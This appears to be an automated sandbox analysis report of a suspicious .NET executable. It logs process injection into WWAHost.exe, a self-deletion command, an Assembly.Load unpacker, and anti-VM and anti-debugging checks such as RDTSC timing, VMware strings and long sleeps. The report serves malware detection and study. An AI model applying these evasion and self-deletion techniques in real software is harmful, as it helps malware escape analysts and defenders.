Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior

Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WWAHost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WWAHost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: JdtN8nIcLi8RQOi.exe

ReversingLabs: Detection: 21%

Source: unknown	Process created: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe 'C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe'
Source: unknown	Process created: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe
Source: unknown	Process created: C:\Windows\SysWOW64\WWAHost.exe C:\Windows\SysWOW64\WWAHost.exe
Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe'
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Process created: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Jump to behavior
Source: C:\Windows\SysWOW64\WWAHost.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe'	Jump to behavior

Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe

File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll

Jump to behavior

Source: JdtN8nIcLi8RQOi.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe

File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll

Jump to behavior

Source: JdtN8nIcLi8RQOi.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: WWAHost.pdb source: JdtN8nIcLi8RQOi.exe, 00000001.00000002.718229203.0000000002D70000.00000040.00000001.sdmp
Source:	Binary string: wscui.pdbUGP source: explorer.exe, 00000002.00000000.693274413.0000000005A00000.00000002.00000001.sdmp
Source:	Binary string: WWAHost.pdbUGP source: JdtN8nIcLi8RQOi.exe, 00000001.00000002.718229203.0000000002D70000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdbUGP source: JdtN8nIcLi8RQOi.exe, 00000001.00000002.715992028.000000000122F000.00000040.00000001.sdmp, WWAHost.exe, 00000006.00000002.1030089804.0000000003130000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: JdtN8nIcLi8RQOi.exe, WWAHost.exe
Source:	Binary string: mscorrc.pdb source: JdtN8nIcLi8RQOi.exe, 00000000.00000002.676064079.00000000035A0000.00000002.00000001.sdmp
Source:	Binary string: wscui.pdb source: explorer.exe, 00000002.00000000.693274413.0000000005A00000.00000002.00000001.sdmp

Data Obfuscation:

.NET source code contains potential unpacker

Show sources

Source: JdtN8nIcLi8RQOi.exe, LoaderInformation.cs	.Net Code: SafeFileMappingHandle System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.0.JdtN8nIcLi8RQOi.exe.fc0000.0.unpack, LoaderInformation.cs	.Net Code: SafeFileMappingHandle System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.2.JdtN8nIcLi8RQOi.exe.fc0000.0.unpack, LoaderInformation.cs	.Net Code: SafeFileMappingHandle System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 1.2.JdtN8nIcLi8RQOi.exe.6a0000.1.unpack, LoaderInformation.cs	.Net Code: SafeFileMappingHandle System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 1.0.JdtN8nIcLi8RQOi.exe.6a0000.0.unpack, LoaderInformation.cs	.Net Code: SafeFileMappingHandle System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])

Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 0_2_01BAD0F4 push ecx; retf	0_2_01BAD0F5
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_0041604B pushfd ; retf	1_2_0041604C
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_00407008 push esi; ret	1_2_00407009
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_0041B3F2 push eax; ret	1_2_0041B3F8
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_0041B3FB push eax; ret	1_2_0041B462
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_0041B3A5 push eax; ret	1_2_0041B3F8
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_0041B45C push eax; ret	1_2_0041B462
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_0118D0D1 push ecx; ret	1_2_0118D0E4
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_031AD0D1 push ecx; ret	6_2_031AD0E4
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_00327008 push esi; ret	6_2_00327009
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_0033604B pushfd ; retf	6_2_0033604C
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_0033B3A5 push eax; ret	6_2_0033B3F8
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_0033B3F2 push eax; ret	6_2_0033B3F8
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_0033B3FB push eax; ret	6_2_0033B462
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 6_2_0033B45C push eax; ret	6_2_0033B462

Source: initial sample

Static PE information: section name: .text entropy: 7.21231975694

Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WWAHost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WWAHost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WWAHost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WWAHost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WWAHost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Yara detected AntiVM_3

Show sources

Source: Yara match	File source: 00000000.00000002.676624298.0000000003A61000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: JdtN8nIcLi8RQOi.exe PID: 6596, type: MEMORY

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: JdtN8nIcLi8RQOi.exe, 00000000.00000002.676624298.0000000003A61000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLL
Source: JdtN8nIcLi8RQOi.exe, 00000000.00000002.676624298.0000000003A61000.00000004.00000001.sdmp	Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	RDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	RDTSC instruction interceptor: First address: 000000000040896E second address: 0000000000408974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\WWAHost.exe	RDTSC instruction interceptor: First address: 00000000003285E4 second address: 00000000003285EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\WWAHost.exe	RDTSC instruction interceptor: First address: 000000000032896E second address: 0000000000328974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe

Code function: 1_2_004088A0 rdtsc

1_2_004088A0

Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe TID: 6604	Thread sleep time: -50832s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe TID: 6588	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 6864	Thread sleep time: -90000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WWAHost.exe TID: 6152	Thread sleep time: -54000s >= -30000s	Jump to behavior

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\WWAHost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\WWAHost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: JdtN8nIcLi8RQOi.exe, 00000000.00000002.676624298.0000000003A61000.00000004.00000001.sdmp	Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: explorer.exe, 00000002.00000000.696371602.000000000A60E000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000002.00000000.693078252.00000000058C0000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: JdtN8nIcLi8RQOi.exe, 00000000.00000002.676624298.0000000003A61000.00000004.00000001.sdmp	Binary or memory string: vmware
Source: explorer.exe, 00000002.00000000.693540842.0000000006650000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000002.00000000.696371602.000000000A60E000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: WWAHost.exe, 00000006.00000002.1029527940.000000000252E000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000002.00000002.1037609731.0000000004710000.00000004.00000001.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
Source: explorer.exe, 00000002.00000000.696503730.000000000A716000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
Source: explorer.exe, 00000002.00000000.693078252.00000000058C0000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000002.00000000.693078252.00000000058C0000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: JdtN8nIcLi8RQOi.exe, 00000000.00000002.676624298.0000000003A61000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA II
Source: explorer.exe, 00000002.00000000.696503730.000000000A716000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
Source: JdtN8nIcLi8RQOi.exe, 00000000.00000002.676624298.0000000003A61000.00000004.00000001.sdmp	Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
Source: explorer.exe, 00000002.00000000.693078252.00000000058C0000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\WWAHost.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe

Code function: 1_2_004088A0 rdtsc

1_2_004088A0

Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe

Code function: 1_2_00409B10 LdrLoadDll,

1_2_00409B10

Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_01139100 mov eax, dword ptr fs:[00000030h]	1_2_01139100
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_01139100 mov eax, dword ptr fs:[00000030h]	1_2_01139100
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_01139100 mov eax, dword ptr fs:[00000030h]	1_2_01139100
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_0116513A mov eax, dword ptr fs:[00000030h]	1_2_0116513A
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_0116513A mov eax, dword ptr fs:[00000030h]	1_2_0116513A
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_01154120 mov eax, dword ptr fs:[00000030h]	1_2_01154120
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_01154120 mov eax, dword ptr fs:[00000030h]	1_2_01154120
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_01154120 mov eax, dword ptr fs:[00000030h]	1_2_01154120
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_01154120 mov eax, dword ptr fs:[00000030h]	1_2_01154120
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_01154120 mov ecx, dword ptr fs:[00000030h]	1_2_01154120
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_0115B944 mov eax, dword ptr fs:[00000030h]	1_2_0115B944
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_0115B944 mov eax, dword ptr fs:[00000030h]	1_2_0115B944
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_0113B171 mov eax, dword ptr fs:[00000030h]	1_2_0113B171
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_0113B171 mov eax, dword ptr fs:[00000030h]	1_2_0113B171
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_0113C962 mov eax, dword ptr fs:[00000030h]	1_2_0113C962
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_01162990 mov eax, dword ptr fs:[00000030h]	1_2_01162990
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_0116A185 mov eax, dword ptr fs:[00000030h]	1_2_0116A185
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_0115C182 mov eax, dword ptr fs:[00000030h]	1_2_0115C182
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_011B51BE mov eax, dword ptr fs:[00000030h]	1_2_011B51BE
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_011B51BE mov eax, dword ptr fs:[00000030h]	1_2_011B51BE
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_011B51BE mov eax, dword ptr fs:[00000030h]	1_2_011B51BE
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_011B51BE mov eax, dword ptr fs:[00000030h]	1_2_011B51BE
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_011661A0 mov eax, dword ptr fs:[00000030h]	1_2_011661A0
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_011661A0 mov eax, dword ptr fs:[00000030h]	1_2_011661A0
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_011F49A4 mov eax, dword ptr fs:[00000030h]	1_2_011F49A4
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_011F49A4 mov eax, dword ptr fs:[00000030h]	1_2_011F49A4
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_011F49A4 mov eax, dword ptr fs:[00000030h]	1_2_011F49A4
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_011F49A4 mov eax, dword ptr fs:[00000030h]	1_2_011F49A4
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_011B69A6 mov eax, dword ptr fs:[00000030h]	1_2_011B69A6
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_0113B1E1 mov eax, dword ptr fs:[00000030h]	1_2_0113B1E1
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_0113B1E1 mov eax, dword ptr fs:[00000030h]	1_2_0113B1E1
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_0113B1E1 mov eax, dword ptr fs:[00000030h]	1_2_0113B1E1
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_011C41E8 mov eax, dword ptr fs:[00000030h]	1_2_011C41E8
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_011B7016 mov eax, dword ptr fs:[00000030h]	1_2_011B7016
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_011B7016 mov eax, dword ptr fs:[00000030h]	1_2_011B7016
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_011B7016 mov eax, dword ptr fs:[00000030h]	1_2_011B7016
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_0115A830 mov eax, dword ptr fs:[00000030h]	1_2_0115A830
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_0115A830 mov eax, dword ptr fs:[00000030h]	1_2_0115A830
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_0115A830 mov eax, dword ptr fs:[00000030h]	1_2_0115A830
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_0115A830 mov eax, dword ptr fs:[00000030h]	1_2_0115A830
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_01204015 mov eax, dword ptr fs:[00000030h]	1_2_01204015
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_01204015 mov eax, dword ptr fs:[00000030h]	1_2_01204015
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_0116002D mov eax, dword ptr fs:[00000030h]	1_2_0116002D
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_0116002D mov eax, dword ptr fs:[00000030h]	1_2_0116002D
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_0116002D mov eax, dword ptr fs:[00000030h]	1_2_0116002D
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_0116002D mov eax, dword ptr fs:[00000030h]	1_2_0116002D
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_0116002D mov eax, dword ptr fs:[00000030h]	1_2_0116002D
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_0114B02A mov eax, dword ptr fs:[00000030h]	1_2_0114B02A
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_0114B02A mov eax, dword ptr fs:[00000030h]	1_2_0114B02A
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_0114B02A mov eax, dword ptr fs:[00000030h]	1_2_0114B02A
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_0114B02A mov eax, dword ptr fs:[00000030h]	1_2_0114B02A
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_01150050 mov eax, dword ptr fs:[00000030h]	1_2_01150050
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_01150050 mov eax, dword ptr fs:[00000030h]	1_2_01150050
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_01201074 mov eax, dword ptr fs:[00000030h]	1_2_01201074
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_011F2073 mov eax, dword ptr fs:[00000030h]	1_2_011F2073
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_01139080 mov eax, dword ptr fs:[00000030h]	1_2_01139080
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_011B3884 mov eax, dword ptr fs:[00000030h]	1_2_011B3884
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_011B3884 mov eax, dword ptr fs:[00000030h]	1_2_011B3884
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_0116F0BF mov ecx, dword ptr fs:[00000030h]	1_2_0116F0BF
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_0116F0BF mov eax, dword ptr fs:[00000030h]	1_2_0116F0BF
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_0116F0BF mov eax, dword ptr fs:[00000030h]	1_2_0116F0BF
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_011620A0 mov eax, dword ptr fs:[00000030h]	1_2_011620A0
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_011620A0 mov eax, dword ptr fs:[00000030h]	1_2_011620A0
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_011620A0 mov eax, dword ptr fs:[00000030h]	1_2_011620A0
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_011620A0 mov eax, dword ptr fs:[00000030h]	1_2_011620A0
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_011620A0 mov eax, dword ptr fs:[00000030h]	1_2_011620A0
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_011620A0 mov eax, dword ptr fs:[00000030h]	1_2_011620A0
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_011790AF mov eax, dword ptr fs:[00000030h]	1_2_011790AF
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_011CB8D0 mov eax, dword ptr fs:[00000030h]	1_2_011CB8D0
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_011CB8D0 mov ecx, dword ptr fs:[00000030h]	1_2_011CB8D0
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_011CB8D0 mov eax, dword ptr fs:[00000030h]	1_2_011CB8D0
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_011CB8D0 mov eax, dword ptr fs:[00000030h]	1_2_011CB8D0
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_011CB8D0 mov eax, dword ptr fs:[00000030h]	1_2_011CB8D0
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_011CB8D0 mov eax, dword ptr fs:[00000030h]	1_2_011CB8D0
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_011340E1 mov eax, dword ptr fs:[00000030h]	1_2_011340E1
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_011340E1 mov eax, dword ptr fs:[00000030h]	1_2_011340E1
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_011340E1 mov eax, dword ptr fs:[00000030h]	1_2_011340E1
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_011358EC mov eax, dword ptr fs:[00000030h]	1_2_011358EC
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_011F131B mov eax, dword ptr fs:[00000030h]	1_2_011F131B
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_0113F358 mov eax, dword ptr fs:[00000030h]	1_2_0113F358
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_0113DB40 mov eax, dword ptr fs:[00000030h]	1_2_0113DB40
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_01163B7A mov eax, dword ptr fs:[00000030h]	1_2_01163B7A
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_01163B7A mov eax, dword ptr fs:[00000030h]	1_2_01163B7A
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_0113DB60 mov ecx, dword ptr fs:[00000030h]	1_2_0113DB60
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_01208B58 mov eax, dword ptr fs:[00000030h]	1_2_01208B58
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe	Code function: 1_2_01162397 mov eax, dword ptr fs:[00000030h]	1_2_01162397
